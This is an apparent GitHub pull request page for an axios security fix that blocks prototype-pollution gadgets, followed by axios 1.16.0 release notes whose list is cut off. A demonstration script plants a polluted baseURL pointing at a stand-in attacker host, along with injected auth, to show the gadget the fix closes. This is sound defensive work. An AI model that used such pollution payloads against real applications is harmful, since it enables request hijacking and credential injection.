
fix: more header pollutions #10779

Merged
jasonsaayman merged 5 commits into v1.x from fix/axi-226-pollution-in-http-adapter on Apr 20, 2026

Conversation

@jasonsaayman jasonsaayman commented Apr 20, 2026

Summary by cubic

Prevents prototype‑polluted configs from injecting headers or hijacking URLs by reading only own properties and using null‑prototype configs. Hardens the Node HTTP adapter so polluted auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser cannot influence requests. Addresses Linear AXI-226.

Description

  • Summary of changes
    • HTTP adapter: read own auth/beforeRedirect; set options.insecureHTTPParser = Boolean(own('insecureHTTPParser')); build options and beforeRedirects with null prototypes.
    • resolveConfig: read only own props and build URLs via buildFullPath(baseURL, url, allowAbsoluteUrls).
    • mergeConfig: return a null‑prototype object and restore hasOwnProperty as a non‑enumerable own slot.
    • Validator: use an own‑property check on the schema to avoid polluted validators.
  • Reasoning
    • Stops prototype pollution from setting Authorization, altering redirect behavior, enabling insecure parsing, or hijacking baseURL.
    • Null‑prototype configs ensure nothing inherited from Object.prototype is observed by runtime code or Node’s http.request.
  • Additional context
    • Extends AXI-226 hardening to more gadgets and aligns with GHSA‑q8qp‑cvcw‑x6jj.

Docs

Add a brief note in /docs/ (security) about stricter own‑property reads and null‑prototype configs. No API changes.

Testing

Added unit tests covering: ignored polluted auth, socketPath, beforeRedirect, insecureHTTPParser, and baseURL (including allowAbsoluteUrls: false); strict parser failures validated via HPE_* codes when pollution is blocked; null‑prototype structure and hasOwnProperty; and broader gadget coverage (adapter, agents, proxy, content/redirect limits, params/paramsSerializer, method, decompress, responseType, transforms). Updated tests to be parser‑version agnostic.

Semantic version impact

Patch: security hardening and bug fixes only; no breaking changes.

Written for commit 17c83a5. Summary will update on new commits.
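The two hardening layers the description lists (own-property reads in the adapter and a null-prototype merged config), shown as an added JavaScript example that is not axios's own code. `buildFullPath`, the two merge functions and `buildRequestOptions` are simplified stand-ins modelled on the behaviour described above, and the pollution payload is constructed for the demonstration.

```javascript
// Added example, not axios's own code: a toy config pipeline that contrasts a
// naive merge/read path with the two hardening layers this PR describes
// (own-property reads in the adapter, null-prototype merged configs).

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
const isAbsoluteURL = (url) => /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);

// Modelled on axios's buildFullPath/combineURLs semantics (assumption): a
// relative url is joined to baseURL; an absolute url wins unless
// allowAbsoluteUrls is false.
function buildFullPath(baseURL, requestedURL, allowAbsoluteUrls) {
  const isRelative = !isAbsoluteURL(requestedURL);
  if (baseURL && (isRelative || allowAbsoluteUrls === false)) {
    return baseURL.replace(/\/?\/$/, '') + '/' + requestedURL.replace(/^\/+/, '');
  }
  return requestedURL;
}

// Naive merge: an ordinary object, so any key absent from the config resolves
// through Object.prototype (the gadget this PR closes).
function naiveMergeConfig(defaults, request) {
  return Object.assign({}, defaults, request);
}

// Hardened merge (shape assumed, not axios's mergeConfig): null-prototype
// result, own keys only, and hasOwnProperty restored as a non-enumerable own
// slot so code calling config.hasOwnProperty(...) keeps working.
function hardenedMergeConfig(defaults, request) {
  const out = Object.create(null);
  for (const src of [defaults, request]) {
    for (const key of Object.keys(src)) out[key] = src[key];
  }
  Object.defineProperty(out, 'hasOwnProperty', {
    value: Object.prototype.hasOwnProperty,
    enumerable: false, writable: true, configurable: true,
  });
  return out;
}

// Adapter-side read of the request options. With readOwnOnly=false a plain
// property lookup is used (pre-fix behaviour); with readOwnOnly=true only own
// properties are honoured, as the PR does for auth, baseURL, socketPath and
// insecureHTTPParser.
function buildRequestOptions(config, readOwnOnly) {
  const read = (key) => (readOwnOnly && !hasOwn(config, key) ? undefined : config[key]);
  const options = Object.create(null);
  options.path = buildFullPath(read('baseURL'), read('url'), read('allowAbsoluteUrls') !== false);
  const auth = read('auth');
  if (auth) options.auth = auth.username + ':' + (auth.password || '');
  options.socketPath = read('socketPath');
  options.insecureHTTPParser = Boolean(read('insecureHTTPParser'));
  return options;
}

// Constructed pollution payload: keys an upstream prototype-pollution bug might
// have planted on Object.prototype before the request is built.
const POLLUTION = {
  baseURL: 'http://attacker.invalid',
  auth: { username: 'injected', password: 'x' },
  insecureHTTPParser: true,
};

// Applies the pollution for the duration of fn() and always removes it again.
function withPollution(fn) {
  for (const key of Object.keys(POLLUTION)) Object.prototype[key] = POLLUTION[key];
  try {
    return fn();
  } finally {
    for (const key of Object.keys(POLLUTION)) delete Object.prototype[key];
  }
}

// Builds the options for `request` under pollution with the given merge and read strategy.
function runScenario(merge, readOwnOnly, request) {
  return withPollution(() => buildRequestOptions(merge({ timeout: 1000 }, request), readOwnOnly));
}

console.log('naive   :', runScenario(naiveMergeConfig, false, { url: '/api/users' }));
console.log('hardened:', runScenario(hardenedMergeConfig, true, { url: '/api/users' }));
```

Running it shows the naive path picking up the polluted baseURL, auth and insecureHTTPParser while the hardened path sees only the request's own url; either layer on its own already blocks the gadget, and an absolute url bypasses baseURL regardless, which is why a test for the polluted-baseURL path needs a relative url or allowAbsoluteUrls: false.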

@jasonsaayman jasonsaayman self-assigned this Apr 20, 2026
@jasonsaayman jasonsaayman added the priority::medium (A medium priority) and commit::fix (The PR is related to a bugfix) labels Apr 20, 2026

@cubic-dev-ai cubic-dev-ai Bot left a comment

2 issues found across 3 files

Confidence score: 4/5

  • This PR appears safe to merge with minimal risk because the reported problems are test-design gaps in tests/unit/prototypePollution.test.js, not a confirmed runtime break in production code.
  • The most severe issue is that using an absolute URL bypasses polluted Object.prototype.baseURL, so the current test may not actually validate the prototype-inheritance path and could miss a regression.
  • A second issue is that the assertion uses a well-formed server response, which does not clearly separate secure vs. polluted parsing behavior; this weakens confidence that the gadget-blocking behavior is truly enforced.
  • Pay close attention to tests/unit/prototypePollution.test.js - security-focused assertions may be giving false confidence unless URL handling and malformed-header failure paths are exercised.
Prompt for AI agents (unresolved issues)

Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="tests/unit/prototypePollution.test.js">

<violation number="1" location="tests/unit/prototypePollution.test.js:435">
P2: This assertion never distinguishes secure vs. polluted parsing because the server response is well-formed. Use a malformed header response and assert the request still fails to actually verify the gadget is blocked.</violation>

<violation number="2" location="tests/unit/prototypePollution.test.js:505">
P2: This request uses an absolute URL, so the polluted `Object.prototype.baseURL` is ignored. Use `allowAbsoluteUrls: false` (or a relative URL) so the test actually exercises the inheritance path.</violation>
</file>

Reply with feedback, questions, or to request a fix. Tag @cubic-dev-ai to re-run a review.

@cubic-dev-ai cubic-dev-ai Bot left a comment

1 issue found across 2 files (changes from recent commits).

Prompt for AI agents (unresolved issues)

Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="tests/unit/prototypePollution.test.js">

<violation number="1" location="tests/unit/prototypePollution.test.js:531">
P2: This test expects the wrong parser error code for LF-only responses. Strict llhttp parsing should report `HPE_LF_EXPECTED`, so matching `HPE_CR_EXPECTED` will make the test fail incorrectly.</violation>
</file>

Reply with feedback, questions, or to request a fix. Tag @cubic-dev-ai to re-run a review.

@jasonsaayman jasonsaayman merged commit 4791514 into v1.x Apr 20, 2026
32 of 33 checks passed
@jasonsaayman jasonsaayman deleted the fix/axi-226-pollution-in-http-adapter branch April 20, 2026 19:33
Comment thread lib/core/mergeConfig.js

// Use a null-prototype object so that downstream reads such as `config.auth`
// or `config.baseURL` cannot inherit polluted values from Object.prototype
// (see GHSA-q8qp-cvcw-x6jj). `hasOwnProperty` is restored as a non-enumerable

Is this GHSA not public yet? I wanted to take a peek, but it 404s right now: GHSA-q8qp-cvcw-x6jj

@jasonsaayman (Member, Author) replied:

Yes, sorry, I should not have referenced this yet, as I am trying to fix the CVEs and then do the release in a more rolled-out manner. Please see the security docs. I will improve this process.


Alright, thanks for the clarification!

saikumarrs pushed a commit to rudderlabs/rudder-sdk-node that referenced this pull request May 24, 2026
![snyk-top-banner](https://res.cloudinary.com/snyk/image/upload/r-d/scm-platform/snyk-pull-requests/pr-banner-default.svg)


<h3>Snyk has created this PR to upgrade axios from 1.15.2 to
1.16.0.</h3>

:information_source: Keep your dependencies up-to-date. This makes it
easier to fix existing vulnerabilities and to more quickly identify and
fix newly disclosed vulnerabilities when they affect your project.

<hr/>


- The recommended version is **1 version** ahead of your current
version.

- The recommended version was released **21 days ago**.


#### Breaking Change Risk

![Merge Risk:
Medium](https://img.shields.io/badge/Merge%20Risk%3A%20Medium-8B4513?style=for-the-badge)

> **Notice:** This assessment is enhanced by AI.


<details>
<summary><b>Release notes</b></summary>
<br/>
  <details>
    <summary>Package name: <b>axios</b></summary>
    <ul>
      <li>
<b>1.16.0</b> - <a
href="https://redirect.github.com/axios/axios/releases/tag/v1.16.0">2026-05-02</a></br><h2>v1.16.0
— May 2, 2026</h2>
<p>This release adds support for the QUERY HTTP method and a new
<code>ECONNREFUSED</code> error constant, lands a substantial wave of
HTTP, fetch, and XHR adapter bug fixes around redirects, aborts,
headers, and timeouts, and welcomes 23 new contributors.</p>
<h2><g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Notable
Changes</h2>
<p>A handful of fixes in this release are either security-adjacent or
change observable behaviour. Please review before upgrading:</p>
<ul>
<li><strong>Fetch adapter now enforces <code>maxBodyLength</code> and
<code>maxContentLength</code>.</strong> These limits were silently
ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as
a safety net (DoS protection, accidental large uploads) had no
protection. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4310518523"
data-permission-text="Title is private"
data-url="axios/axios#10795"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10795/hovercard"
href="https://redirect.github.com/axios/axios/pull/10795">#10795</a></strong>)</li>
<li><strong>Proxy requests now preserve user-supplied <code>Host</code>
headers.</strong> Previously, the proxy path could overwrite a custom
<code>Host</code>. Virtual-host-style routing through a proxy will now
behave correctly. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4347021851"
data-permission-text="Title is private"
data-url="axios/axios#10822"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10822/hovercard"
href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>)</li>
<li><strong>Basic auth credentials embedded in URLs are now
URL-decoded.</strong> If you have percent-encoded credentials in a URL
(e.g. <code>https://user:p%40ss@host</code>), the decoded value is what
now goes on the wire. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4351589744"
data-permission-text="Title is private"
data-url="axios/axios#10825"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10825/hovercard"
href="https://redirect.github.com/axios/axios/pull/10825">#10825</a></strong>)</li>
<li><strong><code>parseProtocol</code> now strictly requires a colon in
the protocol separator.</strong> Strings that loosely parsed as
protocols before may no longer match. (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4271998290" data-permission-text="Title is private"
data-url="axios/axios#10729"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10729/hovercard"
href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong>Deprecated <code>unescape()</code> replaced with modern
UTF-8 encoding.</strong> Non-ASCII URL handling is now spec-correct;
consumers depending on legacy <code>unescape()</code> quirks may see
different output bytes. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3912225221"
data-permission-text="Title is private"
data-url="axios/axios#7378"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7378/hovercard"
href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong><code>transformRequest</code> input typing change was
reverted.</strong> The typing change introduced in <a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a> was
reverted in <a class="issue-link js-issue-link" data-error-text="Failed
to load title" data-id="4336537376" data-permission-text="Title is
private" data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a>
after follow-up review — net behavior is unchanged from 1.15.2.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336537376" data-permission-text="Title is private"
data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a></strong>)</li>
</ul>
<h2>🚀 New Features</h2>
<ul>
<li><strong>QUERY HTTP Method:</strong> Added support for the QUERY HTTP
method across adapters and type definitions. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4323864507" data-permission-text="Title is private"
data-url="axios/axios#10802"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10802/hovercard"
href="https://redirect.github.com/axios/axios/pull/10802">#10802</a></strong>)</li>
<li><strong>ECONNREFUSED Error Constant:</strong> Exposed
<code>ECONNREFUSED</code> as a constant on <code>AxiosError</code> so
callers can match connection-refused failures without comparing string
literals (closes <a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="2398798239"
data-permission-text="Title is private"
data-url="axios/axios#6485"
data-hovercard-type="issue"
data-hovercard-url="/axios/axios/issues/6485/hovercard"
href="https://redirect.github.com/axios/axios/issues/6485">#6485</a>).
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4235938363" data-permission-text="Title is private"
data-url="axios/axios#10680"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10680/hovercard"
href="https://redirect.github.com/axios/axios/pull/10680">#10680</a></strong>)</li>
<li><strong>Encode Helper Export:</strong> Exported the internal
<code>encode</code> helper from <code>buildURL</code> so userland param
serializers can reuse the same encoding logic that axios uses
internally. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3023608053"
data-permission-text="Title is private"
data-url="axios/axios#6897"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6897/hovercard"
href="https://redirect.github.com/axios/axios/pull/6897">#6897</a></strong>)</li>
</ul>
<h2>🐛 Bug Fixes</h2>
<ul>
<li><strong>HTTP Adapter — Redirects &amp; Headers:</strong> Cleared
stale headers when a redirect targets a no-proxy host, fixed the
redirect listener chain so listeners no longer stack across hops,
restored the missing <code>requestDetails</code> argument on
<code>beforeRedirect</code>, preserved user-supplied <code>Host</code>
headers when forwarding through a proxy, and properly URL-decoded basic
auth credentials. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4310371730"
data-permission-text="Title is private"
data-url="axios/axios#10794"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10794/hovercard"
href="https://redirect.github.com/axios/axios/pull/10794">#10794</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4323346513" data-permission-text="Title is private"
data-url="axios/axios#10800"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10800/hovercard"
href="https://redirect.github.com/axios/axios/pull/10800">#10800</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2141603120" data-permission-text="Title is private"
data-url="axios/axios#6241"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6241/hovercard"
href="https://redirect.github.com/axios/axios/pull/6241">#6241</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4347021851" data-permission-text="Title is private"
data-url="axios/axios#10822"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10822/hovercard"
href="https://redirect.github.com/axios/axios/pull/10822">#10822</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4351589744" data-permission-text="Title is private"
data-url="axios/axios#10825"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10825/hovercard"
href="https://redirect.github.com/axios/axios/pull/10825">#10825</a></strong>)</li>
<li><strong>HTTP Adapter — Streams &amp; Timeouts:</strong> Preserved
the partial response object on <code>AxiosError</code> when a stream is
aborted after headers arrive, honoured the <code>timeout</code> option
during the connect phase when redirects are disabled, and resolved an
unsettled-promise hang when an aborted request was combined with
compression and <code>maxRedirects: 0</code>. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4260994859" data-permission-text="Title is private"
data-url="axios/axios#10708"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10708/hovercard"
href="https://redirect.github.com/axios/axios/pull/10708">#10708</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4344944445" data-permission-text="Title is private"
data-url="axios/axios#10819"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10819/hovercard"
href="https://redirect.github.com/axios/axios/pull/10819">#10819</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3509777101" data-permission-text="Title is private"
data-url="axios/axios#7149"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7149/hovercard"
href="https://redirect.github.com/axios/axios/pull/7149">#7149</a></strong>)</li>
<li><strong>Fetch Adapter:</strong> Enforced <code>maxBodyLength</code>
/ <code>maxContentLength</code> in the fetch adapter, set the
<code>User-Agent</code> header to match the HTTP adapter, preserved the
original abort reason instead of replacing it with a generic error, and
deferred global access so importing the module no longer throws a
<code>TypeError</code> in restricted environments. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4310518523" data-permission-text="Title is private"
data-url="axios/axios#10795"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10795/hovercard"
href="https://redirect.github.com/axios/axios/pull/10795">#10795</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4294198336" data-permission-text="Title is private"
data-url="axios/axios#10772"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10772/hovercard"
href="https://redirect.github.com/axios/axios/pull/10772">#10772</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336242387" data-permission-text="Title is private"
data-url="axios/axios#10806"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10806/hovercard"
href="https://redirect.github.com/axios/axios/pull/10806">#10806</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3662226069" data-permission-text="Title is private"
data-url="axios/axios#7260"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7260/hovercard"
href="https://redirect.github.com/axios/axios/pull/7260">#7260</a></strong>)</li>
<li><strong>XHR Adapter:</strong> Unsubscribed the
<code>cancelToken</code> and <code>AbortSignal</code> listeners on the
error, timeout, and abort code paths to prevent leaked subscriptions.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4303641135" data-permission-text="Title is private"
data-url="axios/axios#10787"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10787/hovercard"
href="https://redirect.github.com/axios/axios/pull/10787">#10787</a></strong>)</li>
<li><strong>Error Handling:</strong> Attached the parsed response to
<code>AxiosError</code> when <code>JSON.parse</code> fails inside
<code>dispatchRequest</code>, prevented <code>settle</code> from
emitting <code>undefined</code> error codes, and tightened the
<code>parseProtocol</code> regex to require a colon in the protocol
separator. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4270604544"
data-permission-text="Title is private"
data-url="axios/axios#10724"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10724/hovercard"
href="https://redirect.github.com/axios/axios/pull/10724">#10724</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3678162351" data-permission-text="Title is private"
data-url="axios/axios#7276"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7276/hovercard"
href="https://redirect.github.com/axios/axios/pull/7276">#7276</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4271998290" data-permission-text="Title is private"
data-url="axios/axios#10729"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10729/hovercard"
href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong>Types &amp; Exports:</strong> Aligned the CommonJS
<code>CancelToken</code> typings with the ESM build, fixed a compiler
error caused by <code>RawAxiosHeaders</code>, and re-exported
<code>create</code> from the package index. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="3959718695" data-permission-text="Title is private"
data-url="axios/axios#7414"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7414/hovercard"
href="https://redirect.github.com/axios/axios/pull/7414">#7414</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2291674940" data-permission-text="Title is private"
data-url="axios/axios#6389"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6389/hovercard"
href="https://redirect.github.com/axios/axios/pull/6389">#6389</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="2365076865" data-permission-text="Title is private"
data-url="axios/axios#6460"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/6460/hovercard"
href="https://redirect.github.com/axios/axios/pull/6460">#6460</a></strong>)</li>
<li><strong>UTF-8 Encoding:</strong> Replaced the deprecated
<code>unescape()</code> call with a modern UTF-8 encoding
implementation. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="3912225221"
data-permission-text="Title is private"
data-url="axios/axios#7378"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7378/hovercard"
href="https://redirect.github.com/axios/axios/pull/7378">#7378</a></strong>)</li>
<li><strong>Misc Cleanup:</strong> Resolved a batch of small
inconsistencies and gadget-level issues across the codebase. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4365717510" data-permission-text="Title is private"
data-url="axios/axios#10833"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10833/hovercard"
href="https://redirect.github.com/axios/axios/pull/10833">#10833</a></strong>)</li>
</ul>
<h2>🔧 Maintenance &amp; Chores</h2>
<ul>
<li><strong>Refactor — ES6 Modernisation:</strong> Modernised the
<code>utils</code> module and XHR adapter to use ES6 features, and
tidied the multipart boundary error message. (<strong><a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4173424907" data-permission-text="Title is private"
data-url="axios/axios#10588"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10588/hovercard"
href="https://redirect.github.com/axios/axios/pull/10588">#10588</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="3967256044" data-permission-text="Title is private"
data-url="axios/axios#7419"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/7419/hovercard"
href="https://redirect.github.com/axios/axios/pull/7419">#7419</a></strong>)</li>
<li><strong>Tests:</strong> Hardened the HTTP test server lifecycle to
fix flaky <code>FormData</code> EPIPE failures, fixed Win32 platform
support for the pipe tests, and corrected an incorrect test assumption.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4345005129" data-permission-text="Title is private"
data-url="axios/axios#10820"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10820/hovercard"
href="https://redirect.github.com/axios/axios/pull/10820">#10820</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4305591702" data-permission-text="Title is private"
data-url="axios/axios#10791"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10791/hovercard"
href="https://redirect.github.com/axios/axios/pull/10791">#10791</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4310668356" data-permission-text="Title is private"
data-url="axios/axios#10796"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10796/hovercard"
href="https://redirect.github.com/axios/axios/pull/10796">#10796</a></strong>)</li>
<li><strong>Docs:</strong> Documented
<code>paramsSerializer.encode</code> for strict RFC 3986 query encoding,
updated the <code>parseReviver</code> TypeScript definitions and
configuration docs for ES2023, added timeout guidance to the README's
first async example, and expanded notes around the recent type changes.
(<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4346633084" data-permission-text="Title is private"
data-url="axios/axios#10821"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10821/hovercard"
href="https://redirect.github.com/axios/axios/pull/10821">#10821</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4298576114" data-permission-text="Title is private"
data-url="axios/axios#10782"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10782/hovercard"
href="https://redirect.github.com/axios/axios/pull/10782">#10782</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4290932663" data-permission-text="Title is private"
data-url="axios/axios#10759"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10759/hovercard"
href="https://redirect.github.com/axios/axios/pull/10759">#10759</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4335735712" data-permission-text="Title is private"
data-url="axios/axios#10804"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10804/hovercard"
href="https://redirect.github.com/axios/axios/pull/10804">#10804</a></strong>)</li>
<li><strong>Reverted:</strong> Reverted the
<code>transformRequest</code> input typing change from <a
class="issue-link js-issue-link" data-error-text="Failed to load title"
data-id="4284929830" data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a>
after follow-up review. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4284929830"
data-permission-text="Title is private"
data-url="axios/axios#10745"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10745/hovercard"
href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4336537376" data-permission-text="Title is private"
data-url="axios/axios#10810"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10810/hovercard"
href="https://redirect.github.com/axios/axios/pull/10810">#10810</a></strong>)</li>
<li><strong>Dependencies:</strong> Bumped
<code>actions/setup-node</code>, the <code>github-actions</code> group,
and <code>postcss</code> (in <code>/docs</code>) to their latest
versions. (<strong><a class="issue-link js-issue-link"
data-error-text="Failed to load title" data-id="4301894928"
data-permission-text="Title is private"
data-url="axios/axios#10785"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10785/hovercard"
href="https://redirect.github.com/axios/axios/pull/10785">#10785</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4342327794" data-permission-text="Title is private"
data-url="axios/axios#10813"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10813/hovercard"
href="https://redirect.github.com/axios/axios/pull/10813">#10813</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4342985432" data-permission-text="Title is private"
data-url="axios/axios#10814"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10814/hovercard"
href="https://redirect.github.com/axios/axios/pull/10814">#10814</a></strong>)</li>
<li><strong>Release:</strong> Updated changelog and packages, and
prepared the 1.16.0 release. (<strong><a class="issue-link
js-issue-link" data-error-text="Failed to load title"
data-id="4304455485" data-permission-text="Title is private"
data-url="axios/axios#10790"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10790/hovercard"
href="https://redirect.github.com/axios/axios/pull/10790">#10790</a></strong>,
<strong><a class="issue-link js-issue-link" data-error-text="Failed to
load title" data-id="4368693595" data-permission-text="Title is private"
data-url="axios/axios#10834"
data-hovercard-type="pull_request"
data-hovercard-url="/axios/axios/pull/10834/hovercard"
href="https://redirect.github.com/axios/axios/pull/10834">#10834</a></strong>)</li>
</ul>
<h2>🌟 New Contributors</h2>
<p>We are thrilled to welcome our new contributors. Thank you for
helping improve axios:</p>
<ul>
<li><strong><a href="https://redirect.github.com/singhankit001">@singhankit001</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10588">#10588</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/cuiweixie">@cuiweixie</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/7419">#7419</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/iruizsalinas">@iruizsalinas</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10787">#10787</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/MarcosNocetti">@MarcosNocetti</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10680">#10680</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/deepview-autofix">@deepview-autofix</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10729">#10729</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/atharvasingh7007">@atharvasingh7007</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10745">#10745</a></strong>)</li>
<li><strong><a href="https://redirect.github.com/OfekDanny">@OfekDanny</a></strong> (<strong><a href="https://redirect.github.com/axios/axios/pull/10772">#10772</a></strong>)</li>
